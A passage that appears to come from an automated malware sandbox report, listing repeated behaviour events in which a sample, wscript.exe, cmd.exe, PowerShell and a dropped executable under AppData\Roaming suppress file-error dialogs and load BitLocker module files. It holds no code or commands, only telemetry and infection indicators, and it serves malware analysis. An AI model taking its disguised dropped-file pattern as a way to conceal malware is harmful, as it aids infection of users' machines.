                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
